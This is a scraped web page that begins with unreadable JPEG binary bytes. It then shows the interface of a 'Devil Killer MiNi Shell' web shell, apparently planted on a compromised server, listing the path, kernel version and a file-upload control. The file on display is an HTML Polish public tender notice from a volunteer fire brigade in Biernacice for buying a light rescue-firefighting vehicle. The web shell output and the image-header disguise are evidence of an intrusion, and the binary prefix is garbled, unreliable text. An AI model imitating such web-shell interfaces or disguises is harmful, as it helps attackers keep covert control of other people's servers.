JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220517/0016249701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „ZAKUP LEKKIEGO SAMOCHODU RATOWNICZO-GAŚNICZEGO<br/>WRAZ Z WYPOSAŻENIEM DO JEDNOSTKI OCHOTNICZEJ STRAŻY POŻARNEJ<br/>W BIERNACICACH” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ochotnicza Straż Pożarna w Biernacicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730936498</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Biernacice</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wartkowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">436785105</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ospbiernacice@wartkowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.wartkowice.biuletyn.net/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Stowarzyszenie </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „ZAKUP LEKKIEGO SAMOCHODU RATOWNICZO-GAŚNICZEGO<br/>WRAZ Z WYPOSAŻENIEM DO JEDNOSTKI OCHOTNICZEJ STRAŻY POŻARNEJ<br/>W BIERNACICACH” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cabce60f-d5ca-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00162497</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00123340/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 „ZAKUP LEKKIEGO SAMOCHODU RATOWNICZO-GAŚNICZEGO WRAZ Z WYPOSAŻENIEM DO JEDNOSTKI OCHOTNICZEJ STRAŻY POŻARNEJ W BIERNACICACH”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortal, który dostępny jest pod<br/>adresem https://miniportal.uzp.gov.pl , ePUAPu<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej. Zamawiający zwraca uwagę, że na potrzeby niniejszego postępowania<br/>Urząd Gminy<br/>w Wartkowicach udostępnił Zamawiającemu elektroniczną skrzynkę podawczą (ESP) : /1011052/SkrytkaESP<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma wtedy dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi w szczególności w Instrukcji użytkownika systemu<br/>miniPortal dostępnej pod adresem: https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortalePUAP.pdf<br/>oraz w Warunkach korzystania z elektronicznej platformy usług administracji publicznej ePUAP dostępnych pod adresem:<br/>https://www.gov.pl/web/gov/warunki-korzystania.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych zostały<br/>zapisane w Rozdziale X SWZ OSP.02.2022</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, dalej<br/>„RODO”) w zw. z art. 19 ust. 1 p.z.p., Gmina Wartkowice informuje, że:<br/>1.1. Administratorem Pani/Pana danych osobowych jest Ochotnicza Straż Pożarna w Biernacicach z siedzibą Biernacice 66, 99-220<br/>Wartkowice, reprezentowana przez Prezesa OSP w Biernaciach;<br/>1.2. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego, nr sprawy OSP.02.2022.<br/>1.3. Podanie przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w przepisach p.z.p. związanym z<br/>udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>1.4. Konsekwencje niepodania danych osobowych wynikają z p.z.p..<br/>1.5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 3 oraz 4 p.z.p., przy czym udostepnieniu nie podlegają dane osobowe, o których<br/>mowa w art. 9 ust. 1 RODO, zebrane w toku postępowania o udzielenie zamówienia.<br/>1.6. Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 p.z.p. przez okres co najmniej 4 lat liczonych od dnia<br/>zakończenia postępowania o udzielenie zamówienia publicznego albo do upływu terminu możliwości kontroli projektu<br/>współfinansowanego lub finansowanego ze środków Unii Europejskiej albo jego trwałości takie projektu bądź innych umów czy<br/>zobowiązań wynikających z realizowanych projektów.<br/>1.7. Posiada Pani/Pan prawo do:<br/>1.7.1. na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>1.7.2. na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>1.7.3. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych,<br/>1.7.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>- szczegóły ROZDZIAŁ XXV SWZ OSP.02.2022</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.Nie przysługuje Pani/Panu prawo do:<br/>1.1. prawo do usunięcia danych osobowych w zw. z art. 17 ust. 3 lit. b), d) lub e) RODO,<br/>1.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>1.3. prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c) w zw. z art. 21 RODO.<br/>- szczegóły ROZDZIAŁ XXV SWZ OSP.02.2022</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OSP.02.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zakup i dostawa fabrycznie nowego lekkiego samochodu ratowniczo-gaśniczego<br/>wyprodukowanego w roku 2022 wraz z wyposażeniem do jednostki Ochotniczej Straży Pożarnej w Biernacicach.<br/>2. Opis minimalnych wymaganych parametrów techniczno-użytkowych samochodu i wyposażenia, stanowi szczegółowy<br/>opis przedmiotu zamówienia - Załącznik nr 9 do niniejszej SWZ.<br/>3. Wykonawca dostarczy przedmiot zamówienia we własnym zakresie tj. własnym transportem, na własny koszt i na własne<br/>ryzyko na adres Biernacice 66, 99-220 Wartkowice.<br/>4. Wykonawca udzieli Zamawiającemu na przedmiot zamówienia następujących okresów gwarancji jakości:<br/>1) na lakier – 36 miesięcy,<br/>2) na perforację podwozia – 72 miesiące,<br/>3) na silnik, podzespoły, zabudowę pożarniczą i wyposażenie zamontowane na stałe wskazane<br/>w pkt 2 (tabela - kolumna 3 ) w „Karcie oferowanego samochodu”- Załącznik nr 1A do SWZ - minimum 24-miesięcznej<br/>gwarancji jakości - element oceny na etapie wyboru najkorzystniejszej oferty – vide kryteria oceny ofert – Rozdział XVIII<br/>SWZ.<br/>Ostateczny okres gwarancji jakości zależeć będzie od oferty wybranego Wykonawcy.<br/>4) na wyposażenie niezamontowane na stałe w samochodzie: zestaw PSP-1 z wyposażeniem, wentylator odymiający,<br/>radiotelefonu nasobne, latarki LED typu survival, drabina teleskopowa dielektryczna na dachu – min. 12 miesięcy.<br/>5. Wykonawca zapewni bezpłatny serwis samochodu i wyposażania zamontowanego na stałe<br/>w okresie 24-miesięcznej gwarancji, zgodnie z warunkami zawartymi w dokumentach gwarancyjnych, przeglądy w<br/>autoryzowanym serwisie, konserwacje, zakup i wymianę materiałów eksploatacyjnych w tym podobnych czynności<br/>gwarantujących prawidłową eksploatację samochodu, a także wymaganych przez producentów wyposażenia<br/>zamontowanego na stałe. Okres gwarancji jakości liczony jest od daty podpisania protokołu zdawczo-odbiorczego bez<br/>zastrzeżeń.<br/>6. Wykonawca zapewni Zamawiającemu dokonywanie serwisu gwarancyjnego w autoryzowanym serwisie.<br/>7. Wykonawca dołączy do samochodu niezbędne do jego zarejestrowania dokumenty zgodnie<br/>z zapisami umowy.<br/>8. W okresie udzielonej gwarancji naprawa samochodu oraz wyposażenia wykonywane będą bezpłatnie przez serwis<br/>Wykonawcy w siedzibie Zamawiającego. Naprawy będą wykonywane<br/>w terminie do 72 godzin od daty zgłoszenia awarii /usterki. Do czasu, o którym mowa wyżej nie wlicza się dni ustawowo<br/>wolnych od pracy.<br/>9. W przypadku braku możliwości naprawy samochodu i/lub wyposażenia w siedzibie Zamawiającego dopuszcza się<br/>naprawy gwarancyjne u Wykonawcy na warunkach określonych pomiędzy Zamawiającym a Wykonawcą, w takim przypadku<br/>koszty i ryzyko dostarczenia samochodu i/lub wyposażenia do i od miejsca naprawy obciążają Wykonawcę.<br/>10. Wykonawca zobowiązany będzie wykonać przedmiot zamówienia zgodnie z postanowieniami niniejszej SWZ, zapisami<br/>złożonej oferty, wymaganiami wynikającymi z obowiązujących przepisów prawa, standardów i norm oraz etyką zawodową i<br/>ustalonymi zwyczajami, siłami własnymi.<br/>11. Zaleca się szczegółowe zapoznanie się z treścią Specyfikacji Warunków Zamówienia, zdobycie wszelkich informacji<br/>niezbędnych do prawidłowego przygotowania oferty oraz niezwłocznego poinformowania Zamawiającego o ewentualnych<br/>błędach i przeoczeniach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144210-3 - Wozy strażackie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">35110000-8 - Sprzęt gaśniczy, ratowniczy i bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny tych ofert, które nie zostały odrzucone, na podstawie następujących<br/>kryteriów oceny ofert:<br/>LP NAZWA KRYTERIUM WAGA (w %)<br/>1 CENA 60<br/>2 GWARANCJA JAKOŚCI 40<br/>2. Do oceny poszczególnych ofert w zakresie kryterium CENA zostanie zastosowana metoda polegająca na przyznaniu<br/>przedstawionej poniżej ilości punktów za zaoferowanie w Formularzu Ofertowym przez Wykonawcę ceny ofertowej za wykonanie<br/>przedmiotu zamówienia.<br/>Punktacja w kryterium cena obliczana będzie wg wzoru:<br/>Najniższa cena ofertowa<br/>Cena ofertowa ocenianej oferty x 100 x procentowe znaczenie tego kryterium, tj. 60 %<br/>Wykonawca może otrzymać w ramach niniejszego kryterium maksymalnie 60pkt.<br/>3. Do oceny poszczególnych ofert w zakresie kryterium GWARANCJA JAKOŚCI zostanie zastosowana metoda polegająca na<br/>przyznaniu, w poniżej przedstawiony sposób, ilości punktów za zaoferowanie w Formularzu Ofertowym przez Wykonawcę jednego<br/>okresu gwarancji jakości na silnik, podzespoły, zabudowę pożarniczą i wyposażenie zamontowane na stałe w zaoferowanym<br/>samochodzie (wyposażenie wskazane w pkt 2 (tabela-kolumna 3) w „Karcie oferowanego samochodu” ).<br/>Punktacja w kryterium gwarancja jakości przyznawana będzie następująco:<br/>3.1. udzielenie 24 miesiące gwarancji – 0 pkt.<br/>3.2. udzielenie 36 miesięcy gwarancji - 50 pkt<br/>3.3. udzielenie 48 miesięcy gwarancji - 100 pkt<br/>Ilość przyznanych punktów pomnożona zostanie przez procentowe znaczenie kryterium, tj. 40%<br/>Maksymalna ilość punktów do uzyskania w kryterium 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">GWARANCJA JAKOŚCI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia może ubiegać się Wykonawca, który spełnia następujące warunki udziału w<br/>postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej dwie<br/>dostawy fabrycznie nowego lekkiego samochodu ratowniczo-gaśniczego.<br/>Przez „jedną dostawę” Zamawiający rozumie jedno odpłatne zamówienie /umowę / kontrakt. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 3 do SWZ;<br/>2. odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3. oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego. Wzór oświadczenia stanowi Załącznik nr 6 do<br/>SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te<br/>dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się<br/>lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów -<br/>oświadczenie wykonawcy; W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Przedmiotowy wykaz<br/>należy złożyć w formularzu, którego wzór stanowi załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Karta Oferowanego Samochodu - zgodnie ze wzorem – Załącznik nr 1A do SWZ -stanowiąca opis parametrów<br/>techniczno-użytkowych samochodu i wyposażenia,<br/>2. ważne świadectwo dopuszczenia CNBOP wydane w oparciu o rozporządzenie Ministra Spraw Wewnętrznych i<br/>Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących do zapewnienia bezpieczeństwa publicznego<br/>lub ochronie zdrowia i życia lub mienia, a także wydania dopuszczenia tych wyrobów do użytkowania (Dz. U. z dnia 2007 r.<br/>nr 143, poz. 1002 z poźn. zm.) na oferowany samochód,<br/>3. świadectwo homologacji typu oferowanego samochodu - potwierdzający parametry podwozia oferowanego samochodu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. Karta Oferowanego Samochodu - zgodnie ze wzorem – Załącznik nr 1A do SWZ -stanowiąca opis parametrów<br/>techniczno-użytkowych samochodu i wyposażenia,<br/>2. ważne świadectwo dopuszczenia CNBOP wydane w oparciu o rozporządzenie Ministra Spraw Wewnętrznych i<br/>Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących do zapewnienia bezpieczeństwa publicznego<br/>lub ochronie zdrowia i życia lub mienia, a także wydania dopuszczenia tych wyrobów do użytkowania (Dz. U. z dnia 2007 